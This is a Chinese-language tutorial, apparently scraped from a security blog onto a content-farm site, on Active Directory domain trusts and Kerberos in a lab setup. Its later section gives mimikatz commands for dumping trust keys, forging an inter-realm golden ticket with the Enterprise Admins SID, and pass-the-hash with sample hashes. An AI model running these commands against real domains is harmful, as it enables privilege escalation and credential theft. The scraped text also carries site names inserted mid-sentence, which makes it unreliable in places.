怎么写域

怎么写域

hello大家好,我是安全客小安

怎么写域

,都知道域既是 Windows 网络操作系统的逻辑组织单元,也是Internet的逻辑组织单元,在 Windows 网络操作系统中,域是安全边界。所以对于互联网从业者来说,了解域的知识十分重要

怎么写域

,今天小安为大家介绍这篇来自anw2的文章,它详细的解释了域的环境搭建,域和域之间的关系以及域的渗透,满满的都是干货,赶紧码起来吧!

介绍

大一点企业或公司,都有自己的内网系统,有着各种防护的系统,流量审计,镜像等这些系统。然而这些都是在各种域下,不同部门也是存在不同的域环境,如果拿到一个域控,就可以进行其它域的渗透。这篇文章,先讲解下域之间的关系,在利用域关系进行下一步的渗透。

环境搭建

  • windows 2012 (hack.com 192.168.199.151) 本文中称为A 域
  • windows 2012 (child.hack.com 192.168.199.68) 本文中称为CA 域
  • windows 2008 (localtest.com 原由网192.168.199.129) 本文中称为B 域

A域与CA域是”within forest“ 关系,内部信任是可以传递,这里子域的信任搭建很简单,就不细说了,说一下子域的加入,在CA域的域控搭建完后,选择加入一个存在的域,然后其中有个DSRM 密码:

怎么写域

DSRM账户是域控的本地管理员账户,并非域的管理员帐户。所以DSRM密码同步之后并不会影响域的管理员帐户。 这里有一个DSRM 持久化 ,因为要修改注册表,我反正不喜欢用。

B域信任CA域,属于外部信任,不能传递信任关系,CA域可以访问B域中的资源,讲下这里的搭建过程:

在B域domain trusts设置外部信任后,CA域也会自动创建,可以参考这里:

怎么写域

怎么写域

信任创建完过后,还要设置相应的share文件夹及可以访问的组和用户,参考这里,说一下本环境的搭建:

1.WIN10 加入CA域。

2.建立一个全局的组GCB。

怎么写域

怎么写域

4.在B域中建立一个本地share 组,把CA域的GCB添加到这里,这里添加的时候需要输入CA的用户名和密码验证。

怎么写域

5.在B域的DC的C盘中建立一个share的分享文件夹,把share组的权限添加到当中。

怎么写域

好了,这个外部的信任搭建完成,B信任CA域,所以在CA域的GCB的用户,可以访问在B域DC中share的文件夹内容。

这里没有那些VLAN划分,网络隔离这些东西了原由网。我简单的域环境就搭建完成了。结构图如下:

怎么写域

多个域之间关系

这里涉及到kerberos 认证的过程,不清楚的可以看看我前面的文章。(详情搜索安全客官网)

在client 通过AS 服务的验证过后,会得到这个client的TGT(TGT包含了当前client所www.58yuanyou.com属组及权限,还有其他林中域的组,例如:universal groups)。client利用TGT朝DC请求TGS,然后利用TGS向目标服务器请求访问资源。TGT的生命周期默认10小时,所以攻击者只要拿到KRBTGT的hash password原由网就可以自己伪造签名TGT,这也就是mimi原由网katz生成的黄金票据。这就是域的验证过程。

在一个林中,CA域中的client要访问B域中的服务器的资源,先看下3个域的信任关系:

A域和CA域(就是A的子域):

怎么写域

B域:

怎么写域

拥有多个域的大多数组织都需要用户访问位于不同域中的共享资源,并且信任允许具有多个域的组织授予不同域中的用户访问共享资源的权限。域林是相互信任的域容器的集合。森林本身也可能在它们之间有信任。内部信任具有传递关系,A信任B,B信任C,所以A也是信任C的,但是外部信任不能传递。

从下图看下在不同域的访问过程:

怎么写域

在两个域互相信任过后,会有一个信任密码及在每个域中注册一个ticket-granting服务,用来提供跨域的服务。在上图可以看见蓝色的第4步,得到inter-realm(由域之间信任密码生成)的加密和签名的TGT,向另一个域DC请求TGS,绿色域DC使用信任密码验证通过后,生成了客户端要访问的绿色应用服务器的TGS票据。

Gold Ticket中默认包含了Enterprise Admin 组的关系,而Enterprise Admin又是AD域中Administrator 组的成员。在其中还涉及到了sidHistory和SID过滤安全机制,所以攻击者可以伪造kerberos 票据来获取到域中的Enterprise Admin权限。所以下面我就来介绍下,如何利用Mimikatz 伪装 域信任票据。

域之间渗透

  1. 伪造内部信任AD林中的信任票据

我这里是在子域下的一个普通用户,目标利用伪造trust key来获取AD的访问权限:

怎么写域

1)先利用mimikatz 在域控dump出来的数据privilege::debuglsadump::trust /patch

怎么写域

怎么写域

2)在利用trust key 来伪造凭证是属于EA组的,用户名可以随便填写:

kerberos::golden /domain:child.hack.com /sid:S-1-5-21-840356815-2954379092-972630321 /sids:S-1-5-21-1863527717-1245757989-2975568438-519 /krbtgt:ac51f0ddaf0246a556f1978dd12d2a0f /user:hack$ /ptt

怎么写域

解释下这些参数怎么获取:

domain:当前子域,sid:当前子域SID,sids:信任域的SID,也就是父域,krbtgt:当前域的krbtgt的值,user是trust account,不确定可以使用dcsync在看下。

怎么写域

3)misc::cmd弹出CMD窗口,你也可以导出成Ticket,在导入来获取权限。

怎么写域

2.访问信任域中的资源

1) 在CA域的DC中,mimikatz 执行privilege::debuglsadump::lsa /patch先获取到可以访问B域用户的ntlm

2) sekurlsa::pth /user:child-ita /domain:child.hack.com /ntlm:e45a314c664d40a227f9540121d1a29d /run:powershell.exe利用信任的用户NTLM,访问B域上的分享文件夹。

怎么写域

总结

本文先大概的介绍了域信任的关系,解释了其中用户组认证时的过程,以及涉及到的安装过程。并且利用mimikatz 在不同的信任关系下来利用用户的NTLM伪造和签名trusts ticket来获取域上的资源。在外部的信任中,只有在信任域中的组中的那些被信任域用户,才能访问到信任域中有指定权限的分享文件夹。所以在拿到域控权限的时候,lsadump::lsa /injectlsadump::trust /patch这个命令是一定要有的。

对于这些浅显易懂,同时又很重要的知识解析,不知道你们爱看吗?你们还有哪些想要了解的相关知识,后台告诉小安呀

怎么写域

内容版权声明:除非注明原创否则皆为转载,再次转载请注明出处。

文章标题: 怎么写域

文章地址: www.58yuanyou.com/jiqiao/44769.html

相关推荐